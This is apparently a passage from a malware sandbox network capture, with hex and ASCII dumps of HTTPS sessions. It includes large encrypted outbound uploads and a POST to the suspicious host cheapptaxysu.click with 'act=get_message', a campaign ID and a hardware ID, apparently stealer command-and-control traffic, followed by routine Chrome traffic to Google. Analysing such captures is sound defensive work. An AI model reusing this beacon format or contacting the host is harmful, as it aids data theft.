                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC15331OUTData Raw: b9 ba 9d 1e 7a 25 16 55 fa 99 78 a5 5d 6a b8 10 da 6a 76 7d 71 11 04 de 66 ea 26 f6 c7 8b e8 23 88 31 8d 8e 6d 6e c8 1a 23 f2 51 80 58 be bc 6a d1 97 2a 1b 82 5c 4d 17 b1 b1 a5 43 5c 71 10 f8 b6 c2 41 3b 4f 19 ba 33 df 24 9a 70 ff 03 22 d7 4d 0a 38 a3 6c 7e d1 42 0e 09 e2 31 20 4b 9d a9 37 3a 16 07 4a 9f 33 9c 40 d6 6d 26 2d e4 2c dc 92 19 57 db f9 02 26 37 d3 a9 e6 50 e0 65 66 3c 02 60 f0 8f 46 e7 9c 86 c4 68 f5 06 eb 1f 98 25 0b 63 ad 4d f7 34 cb f7 73 77 9d 8b fa 8f cc d9 8d c0 7c fa db fe 5c 00 91 1b fc fa 4c f9 64 fe 09 27 0f f5 df bd 5e 55 77 08 65 06 43 8e af 66 1a 79 6f 9c b5 2d 59 94 b9 d4 be af 78 8b 69 bc c1 b2 4b de 23 47 aa a1 d8 9b bf 1a eb cb 32 7e 83 97 5b 14 cd 72 64 51 af 18 7a a9 23 0f 90 e0 a2 51 17 67 a9 f5 14 b0 fc bd 5a bb fb b2 ff
                                                                                                                                                                                                                                                              Data Ascii: z%Ux]jjv}qf&#1mn#QXj*\MC\qA;O3$p"M8l~B1 K7:J3@m&-,W&7Pef<`Fh%cM4sw|\Ld'^UweCfyo-YxiK#G2~[rdQz#QgZ
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC15331OUTData Raw: 08 af 42 e0 10 a8 6f 45 e7 2f 47 50 e7 13 f0 3d dc 12 1c 7a b0 70 74 6f 23 6a 99 ae 10 2f 45 c1 be 7c 7c 28 75 49 e9 18 39 03 6a 47 c9 1f 52 a0 23 66 cd 46 58 e3 25 c8 51 65 32 9e 74 6a 59 4b 7b 07 89 bf fe fa 43 58 63 cf f4 4b 82 f6 64 f8 dc 7f 21 bf 4d c2 99 98 83 28 50 b2 85 5a ec 26 f9 90 db 93 2b 03 f2 0c 41 db 12 80 2c e2 7b fd 69 f7 4c 75 87 cb f2 39 ca 8d c1 32 e3 40 14 68 71 9f d0 48 7f bd 04 f5 3c c8 28 a1 4c 3b e7 de 23 0d 4a 5a 06 6a cb 36 0d dc 6f dc 21 94 80 5f 79 02 73 19 6a 68 52 5e 48 67 49 b7 12 f9 b9 97 29 f2 d5 ac ab 87 43 e9 96 2d d4 a0 47 51 81 cc 4f 75 21 af ee 2c 67 fb 2d 3d dc 33 0a f8 0b df d5 c1 4e ea e7 db e7 8f 29 ac ea 33 18 48 4a ca 6a f6 d0 83 f0 e0 50 69 e5 8f 6d 2b 79 62 90 a1 00 df 50 d9 c6 c1 0d 44 b4 33 54 ae 85 0e 4a
                                                                                                                                                                                                                                                              Data Ascii: BoE/GP=zpto#j/E||(uI9jGR#fFX%Qe2tjYK{CXcKd!M(PZ&+A,{iLu92@hqH<(L;#JZj6o!_ysjhR^HgI)C-GQOu!,g-=3N)3HJjPim+ybPD3TJ
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC15331OUTData Raw: b0 46 7c 3d c9 0b a2 53 aa c0 6c 97 58 93 34 d1 56 06 2f 9f 3f 7f fc f6 ed 5e 72 cc cd 0a 2a 6b cd 08 34 62 a7 c7 9f fc e3 b6 f9 53 fc 92 b2 b7 1d f7 ec cd 0f 83 e6 5b 8f ee a2 58 7b 9f 91 95 c0 17 b2 db 58 36 15 f9 da 19 eb 06 9e 2c 48 a5 a6 f6 8d 47 b8 39 be ea fb f5 61 cb c3 1f 8d 1d 82 e1 8f 5f 94 8e 82 33 d1 59 5b b8 cb c2 eb 8c 8e 60 1e 3b cd d0 2f e1 e0 93 b6 12 f0 aa ba 8b 88 74 92 4c 6e f5 71 0e 5a c0 4c 8b fb 13 dd 2e 4d 49 f0 9b 66 7b fe 51 ef 28 5e ac 32 3f 73 d3 aa 9e 7b 74 d2 55 b9 8c bc ac 1d 43 02 b4 ea b5 88 65 d0 54 a3 0e 76 7e 7f bf 61 31 3c d3 be 18 2e 5d 7c 9b b3 7f b4 52 42 fc 8a 43 07 ff a6 6e f0 4b a4 08 eb 07 6c 9e e4 99 8f 32 fd 70 24 3f d1 e7 02 7e d9 d2 42 91 d3 f7 c2 44 78 65 d6 06 d5 e6 a6 33 b5 aa 1b 05 5a 40 3e 48 f4 a9 e7
                                                                                                                                                                                                                                                              Data Ascii: F|=SlX4V/?^r*k4bS[X{X6,HG9a_3Y[`;/tLnqZL.MIf{Q(^2?s{tUCeTv~a1<.]|RBCnKl2p$?~BDxe3Z@>H
                                                                                                                                                                                                                                                              2024-12-22 01:19:16 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:16 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=tdchvhkeamu331p2p03k1ditge; expires=Wed, 16 Apr 2025 19:05:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HmIJmrS%2FlqAULjZWxG2E8GfNBm8K4UWF%2Bgjj1WxD1Fayy8WC18E6Ag4h%2BwCatwKizW65OMi0EUkUDgb%2Ffq0hCSuFjK%2BLuRPtXBN0Zxg6BkCbX7QnOTKeg9GMjH8AUEKG9G5VUtY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c484fb97142d4-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1573&rtt_var=620&sent=172&recv=312&lost=0&retrans=0&sent_bytes=2843&recv_bytes=302371&delivery_rate=1722713&cwnd=247&unsent_bytes=0&cid=36a1345e2fb878c9&ts=2775&x=0"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              73192.168.2.450304104.21.67.146443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:17 UTC355OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 85
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:19:17 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=CZJvss--geopoxid&j=&hwid=F14195A540BC0B98AC8923850305D13E
                                                                                                                                                                                                                                                              2024-12-22 01:19:18 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:18 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=rtch1n88rnjfkv8i4rf77mi6a1; expires=Wed, 16 Apr 2025 19:05:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FDjIfTvC123RmBX24Zjkt3vhkA6H0NiFtKuDa2GGxiJrka7XUIzbkkeDfEyc0oohkkZMBvrlncFXtICw8wmKWlDTy%2BX%2Bkw3Klg4pYMO1IVn9xarfd4UPhnmQulO5VcqjacQcaQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4869ba1942e8-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1587&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1076&delivery_rate=1753753&cwnd=250&unsent_bytes=0&cid=283a2e611a0dfe8c&ts=1046&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:19:18 UTC54INData Raw: 33 30 0d 0a 55 56 71 59 69 30 4a 31 4c 4c 4d 61 4f 59 76 55 30 50 50 6b 6d 50 52 33 75 75 4c 31 71 59 4b 50 61 54 35 5a 48 50 7a 64 33 33 41 4b 42 77 3d 3d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 30UVqYi0J1LLMaOYvU0PPkmPR3uuL1qYKPaT5ZHPzd33AKBw==
                                                                                                                                                                                                                                                              2024-12-22 01:19:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              74192.168.2.450482142.250.181.132443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:04 UTC495OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKDhygE=
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:04 GMT
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-lPUruCoYTdPlNJAtBuDanw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC124INData Raw: 33 34 64 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 33 20 69 6e 67 72 65 64 69 65 6e 74 20 70 65 70 70 65 72 6d 69 6e 74 20 63 6c 6f 75 64 20 63 6f 6f 6b 69 65 73 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 70 6c 61 79 6f 66 66 20 73 63 68 65 64 75 6c 65 22 2c 22 73 6e 6f 77 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 2c 22 62 61 72 72 65 64 20 6f
                                                                                                                                                                                                                                                              Data Ascii: 34d)]}'["",["3 ingredient peppermint cloud cookies","college football playoff schedule","snow weather forecast","barred o
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC728INData Raw: 77 6c 20 6f 6e 20 63 68 72 69 73 74 6d 61 73 20 74 72 65 65 22 2c 22 70 73 35 20 70 72 6f 22 2c 22 64 6f 67 65 63 6f 69 6e 20 70 72 69 63 65 20 70 72 65 64 69 63 74 69 6f 6e 22 2c 22 61 73 74 72 61 6e 69 73 20 6d 69 63 72 6f 67 65 6f 20 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 6c 61 75 6e 63 68 22 2c 22 77 68 61 74 20 69 73 20 73 6f 6e 69 63 20 33 20 73 74 72 65 61 6d 69 6e 67 20 6f 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63
                                                                                                                                                                                                                                                              Data Ascii: wl on christmas tree","ps5 pro","dogecoin price prediction","astranis microgeo spacex falcon 9 launch","what is sonic 3 streaming on"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmc
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              75192.168.2.450481142.250.181.132443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:04 UTC398OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKDhygE=
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:04 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC372INData Raw: 64 63 36 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 5c
                                                                                                                                                                                                                                                              Data Ascii: dc6)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC1390INData Raw: 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30
                                                                                                                                                                                                                                                              Data Ascii: lass\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u00
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC1390INData Raw: 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c
                                                                                                                                                                                                                                                              Data Ascii: 03cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC381INData Raw: 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 38
                                                                                                                                                                                                                                                              Data Ascii: s\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13 8
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC188INData Raw: 62 36 0d 0a 20 36 39 74 2d 36 39 20 32 38 48 32 30 39 5a 6d 32 32 31 2d 36 36 30 76 31 31 30 71 30 20 32 36 2d 37 2e 35 20 35 30 2e 35 54 34 30 31 2d 35 37 33 4c 32 37 36 2d 33 38 35 71 2d 36 20 38 2d 38 2e 35 20 31 36 74 2d 32 2e 35 20 31 36 71 30 20 32 33 20 31 37 20 33 39 2e 35 74 34 32 20 31 36 2e 35 71 32 38 20 30 20 35 36 2d 31 32 74 38 30 2d 34 37 71 36 39 2d 34 35 20 31 30 33 2e 35 2d 36 32 2e 35 54 36 33 33 2d 34 34 33 71 34 2d 31 20 35 2e 35 2d 34 2e 35 74 2d 2e 35 2d 37 2e 35 6c 2d 37 38 2d 31 31 37 71 2d 31 35 2d 32 31 2d 32 32 2e 35 2d 34 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: b6 69t-69 28H209Zm221-660v110q0 26-7.5 50.5T401-573L276-385q-6 8-8.5 16t-2.5 16q0 23 17 39.5t42 16.5q28 0 56-12t80-47q69-45 103.5-62.5T633-443q4-1 5.5-4.5t-.5-7.5l-78-117q-15-21-22.5-4
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC1390INData Raw: 38 30 30 30 0d 0a 36 74 2d 37 2e 35 2d 35 32 76 2d 31 31 30 48 34 33 30 5a 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 70 61 74 68 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 76 67 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 20 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 49 20 67 62 5f 62 64 20 67 62 5f 5a 5c 22 20 64 61 74 61 2d 6f 67 73 72 2d 66 62 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 64 61 74 61 2d 6f 67 73 72 2d 61 6c 74 5c 75 30 30 33 64 5c 22 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 77 61 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30
                                                                                                                                                                                                                                                              Data Ascii: 80006t-7.5-52v-110H430Z\"\u003e\u003c\/path\u003e \u003c\/svg\u003e \u003c\/a\u003e \u003c\/div\u003e \u003c\/div\u003e \u003cdiv class\u003d\"gb_I gb_bd gb_Z\" data-ogsr-fb\u003d\"true\" data-ogsr-alt\u003d\"\" id\u003d\"gbwa\"\u003e\u003cdiv class\u00
